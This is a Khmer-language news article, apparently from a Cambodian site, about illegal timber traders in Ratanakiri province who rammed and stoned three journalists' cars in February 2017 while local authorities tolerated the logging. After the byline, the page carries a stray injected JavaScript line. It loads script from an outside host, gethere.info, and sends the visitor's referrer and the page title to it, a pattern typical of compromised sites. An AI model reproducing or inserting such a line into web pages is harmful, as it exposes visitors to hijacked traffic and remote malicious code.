Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ក្រុមឈ្មួញរកស៊ីឈើវ៉ៃកំទេចរថយន្តអ្នកកាសែត៣គ្រឿងខូចខាតយ៉ាងដំណំខណៈចុះយកពត៍មាន

ខេត្តរតនៈគិរីៈ រថយន្តអ្នកកាសែតបីគ្រឿងត្រូវបានក្រុមអ្នករកស៊ីឈើបានវាយកំទេចក្រោយចុះទៅយកពត៍មានក្តៅលើករណីបទល្មើសព្រៃឈើកាលពីថ្ងៃម៉ោង២និង៥៨នាទីថ្ងៃទី០១គុម្ភៈឆ្នាំ២០១៧ស្ថិតនៅភូមិកាចូនឃុំកាចូនស្រុកវឺនសៃខេត្តរតនៈគីរី។បើតាមការឆ្លើយឆ្លងពីក្រុមអ្នកសារពត៍មានបានឲ្យដឹងថានៅពេលវេលាខាងលើក្រុមអ្នកសាពត៌មានបានចុះទៅថត ទូកដឹកឈើនៅចំណុចកើតហេតុខាងលើ រួចក៏បានបើកឡានត្រលប់មកវិញក៏ត្រូវក្រុមឈ្មួញបើករយន្ដកែឆ្នៃមកបំបុកនឹងគៀបណ្ដាលឲ្យរង ការ ខូចខាត ភ្លាមៗនោះក្រុមសាព័ត៌មានបានខលទូស័ព្ទទៅ ប្ដឹងប៉ូលិសរួចក៏បន្តដំណើទៅមុខទៀតមកពុំបានចម្ងាយប៉ុន្មានផងស្រាប់ តែក្រុមឈ្មួញទាំងនោះបាននាំបក្សពួកមានគ្នាប្រមាណជាង១០នាក់កាប់ឈើដាក់បិតផ្លូវរួចយកដុំថ្មគប់មកលើរថយន្ដអ្នកសាព័ត៌ មានចំនួនបីគ្រឿងបណ្ដាលឲ្យមានខួចខាតយ៉ាងដំណំ។

ក្រោយពីវាយរថយន្តអ្នកកាសែត៣គ្រឿងរួចមកអ្នកកាសែតដែលរងគ្រោះបានទៅដាក់ពាក្យប្តឹងនៅប៉ុស្តិ៍នគរបាលកាចូន ។ សូមបញ្ចាក់ថាតំបន់ខាងលើនេះគេសង្គេតឃើញជំនួញបទល្មើសព្រៃឈើដឹកឆ្លងកាត់និងស្តុកទុកដោយមិនមានការចុះបង្ក្រាបឡើយ ផ្ទុយទៅវិញអាជ្ញាធរស្រុកបែរជាបណ្តែតបណ្តោយអោយក្រុមជំនួញបទល្មើសព្រៃឈើធ្វើតាមតែអំពើចិត្តមិនគិតពីផលប៉ះពាល់លើភូមិឃុំមានសុវត្ថិភាពរបស់រាជរដ្ឋាភិបាល បង្កភាពអនាធិបតេយ្យពិសេសនោះក្រុមអ្នកដឹកឈើបើកឡានក្នុងល្បឿនលឿនមិនគិតពីសុវត្ថិភាពប្រជាពលរដ្ឋក្នងភូមិឃុំនោះទេ។ ចិន្តា

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More